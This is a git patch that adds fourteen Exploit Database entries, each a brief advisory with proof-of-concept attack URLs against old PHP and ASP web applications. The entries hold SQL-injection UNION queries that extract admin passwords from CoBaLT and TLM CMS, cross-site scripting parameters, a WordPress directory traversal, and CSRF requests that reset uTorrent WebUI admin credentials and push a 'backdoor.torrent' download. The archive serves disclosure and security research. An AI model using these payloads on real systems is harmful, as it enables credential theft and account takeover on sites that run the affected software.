From ed3089081609446e02cda64987c78b2ee96eaf92 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 16 Feb 2014 04:27:26 +0000 Subject: [PATCH] Updated 02_16_2014 --- files.csv | 14 ++++++++++++++ platforms/asp/webapps/31666.txt | 11 +++++++++++ platforms/php/webapps/31658.txt | 9 +++++++++ platforms/php/webapps/31659.txt | 12 ++++++++++++ platforms/php/webapps/31660.txt | 7 +++++++ platforms/php/webapps/31661.txt | 7 +++++++ platforms/php/webapps/31662.txt | 7 +++++++ platforms/php/webapps/31663.txt | 7 +++++++ platforms/php/webapps/31664.txt | 7 +++++++ platforms/php/webapps/31665.txt | 7 +++++++ platforms/php/webapps/31668.txt | 11 +++++++++++ platforms/php/webapps/31669.txt | 9 +++++++++ platforms/php/webapps/31670.txt | 10 ++++++++++ platforms/php/webapps/31671.html | 9 +++++++++ platforms/php/webapps/31672.txt | 16 ++++++++++++++++ 15 files changed, 143 insertions(+) create mode 100755 platforms/asp/webapps/31666.txt create mode 100755 platforms/php/webapps/31658.txt create mode 100755 platforms/php/webapps/31659.txt create mode 100755 platforms/php/webapps/31660.txt create mode 100755 platforms/php/webapps/31661.txt create mode 100755 platforms/php/webapps/31662.txt create mode 100755 platforms/php/webapps/31663.txt create mode 100755 platforms/php/webapps/31664.txt create mode 100755 platforms/php/webapps/31665.txt create mode 100755 platforms/php/webapps/31668.txt create mode 100755 platforms/php/webapps/31669.txt create mode 100755 platforms/php/webapps/31670.txt create mode 100755 platforms/php/webapps/31671.html create mode 100755 platforms/php/webapps/31672.txt diff --git a/files.csv b/files.csv index f36e71c15..7410c5d88 100755 --- a/files.csv +++ b/files.csv @@ -28439,3 +28439,17 @@ id,file,description,date,author,platform,type,port 31655,platforms/php/webapps/31655.txt,"Istant-Replay 'read.php' Remote File Include Vulnerability",2008-04-15,THuGM4N,php,webapps,0 31656,platforms/windows/dos/31656.txt,"ICQ 6 'Personal Status Manager' Remote Buffer Overflow Vulnerability",2008-04-16,"Leon Juranic",windows,dos,0 31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 'bs_auth.php' Cross Site Scripting Vulnerability",2008-04-16,ZoRLu,php,webapps,0 +31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 'rep.php' Cross-Site Scripting Vulnerability",2008-04-17,ZoRLu,php,webapps,0 +31659,platforms/php/webapps/31659.txt,"Php-Stats 0.1.9.1 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0 +31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 add_groupe.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 contacts.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 groupes.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 importer.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 login.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 search.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 'adminler.asp' SQL Injection Vulnerability",2008-04-17,U238,asp,webapps,0 +31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 Multiple SQL Injection Vulnerabilities",2008-04-18,ZoRLu,php,webapps,0 +31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 'wiki' Parameter Cross-Site Scripting Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0 +31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0 diff --git a/platforms/asp/webapps/31666.txt b/platforms/asp/webapps/31666.txt new file mode 100755 index 000000000..4465be02d --- /dev/null +++ b/platforms/asp/webapps/31666.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28831/info + +CoBaLT is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CoBaLT 2.0 is affected; other versions may also be vulnerable. + +http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin +http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4 + diff --git a/platforms/php/webapps/31658.txt b/platforms/php/webapps/31658.txt new file mode 100755 index 000000000..03b10646f --- /dev/null +++ b/platforms/php/webapps/31658.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28823/info + +MyBoard is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +MyBoard 1.0.12 is vulnerable; other versions may also be affected. + +http://www.example.com/MyBoard/rep.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31659.txt b/platforms/php/webapps/31659.txt new file mode 100755 index 000000000..1c31f4537 --- /dev/null +++ b/platforms/php/webapps/31659.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/28824/info + +Php-Stats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +Php-Stats 0.1.9.1 is vulnerable; other versions may also be affected. + +http://www.example.com/stats/admin.php?action=systems&mode=0&sel_anno=2008&sel_mese=[XSS] +http://www.example.com/stats/admin.php?action=systems&mode=0&sel_anno=[XSS] + + diff --git a/platforms/php/webapps/31660.txt b/platforms/php/webapps/31660.txt new file mode 100755 index 000000000..3b05c4b0e --- /dev/null +++ b/platforms/php/webapps/31660.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28825/info + +EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/EScontacts_path/EsContacts/add_groupe.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31661.txt b/platforms/php/webapps/31661.txt new file mode 100755 index 000000000..62bbceeac --- /dev/null +++ b/platforms/php/webapps/31661.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28825/info + +EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/EScontacts_path/EsContacts/contacts.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31662.txt b/platforms/php/webapps/31662.txt new file mode 100755 index 000000000..df0224ae6 --- /dev/null +++ b/platforms/php/webapps/31662.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28825/info + +EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/EScontacts_path/EsContacts/groupes.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31663.txt b/platforms/php/webapps/31663.txt new file mode 100755 index 000000000..1e7a92ffe --- /dev/null +++ b/platforms/php/webapps/31663.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28825/info + +EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/EScontacts_path/EsContacts/importer.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31664.txt b/platforms/php/webapps/31664.txt new file mode 100755 index 000000000..4d5d96221 --- /dev/null +++ b/platforms/php/webapps/31664.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28825/info + +EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/EScontacts_path/EsContacts/login.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31665.txt b/platforms/php/webapps/31665.txt new file mode 100755 index 000000000..ab7c383f2 --- /dev/null +++ b/platforms/php/webapps/31665.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28825/info + +EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/EScontacts_path/EsContacts/search.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31668.txt b/platforms/php/webapps/31668.txt new file mode 100755 index 000000000..ef11eb0f9 --- /dev/null +++ b/platforms/php/webapps/31668.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28837/info + +TLM CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +TLM CMS 3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/timcms31/a-b-membres.php?action=Perso&nom=1'/**/union/**/select/**/0,1,2,3,4,5,6,US_uid,8,9,US_mail,11,12,13,14,15,US_pseudo,US_pwd,18,19,20,21,22,23/**/from/**/pphp_user/* +http://www.example.com/tmcms31/goodies.php?act=lire&idnews=-1/**/union/**/select/**/0,1,2,US_pwd,US_pseudo,5,6,7,US_mail,9,10/**/from/**/pphp_user/* + diff --git a/platforms/php/webapps/31669.txt b/platforms/php/webapps/31669.txt new file mode 100755 index 000000000..4ca089f7d --- /dev/null +++ b/platforms/php/webapps/31669.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28842/info + +Wikepage Opus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Wikepage Opus 13 2007.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wikepage_2007_2/index.php?wiki=test%22%20onclick=%22alert(1)%22%20%20bla=%22 \ No newline at end of file diff --git a/platforms/php/webapps/31670.txt b/platforms/php/webapps/31670.txt new file mode 100755 index 000000000..9c62a68de --- /dev/null +++ b/platforms/php/webapps/31670.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28845/info + +WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to access sensitive information that could aid in further attacks. + +WordPress 2.3.3 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/?cat=1.php/../searchform? + diff --git a/platforms/php/webapps/31671.html b/platforms/php/webapps/31671.html new file mode 100755 index 000000000..7c2f6be49 --- /dev/null +++ b/platforms/php/webapps/31671.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28846/info + +TorrentFlux is prone to a cross-site request-forgery vulnerability and a remote PHP code-execution vulnerability. + +Exploiting these issues may allow a remote attacker to create administrative accounts in the application or to execute arbitrary PHP script code. This may facilitate the remote compromise of affected computers. + +TorrentFlux 2.3 is vulnerable; other versions may also be affected. + + Add an admistrative account:
\ No newline at end of file diff --git a/platforms/php/webapps/31672.txt b/platforms/php/webapps/31672.txt new file mode 100755 index 000000000..a1fa62e8a --- /dev/null +++ b/platforms/php/webapps/31672.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/28847/info + +uTorrent WebUI is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to execute arbitrary actions in the context of the affected application. + +uTorrent WebUI 0.310 beta 2 is vulnerable; other versions may also be affected. + +To force a file download: +http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent + +To change administrative credentials and settings: +http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin +http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin +http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://www.example.com:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1 +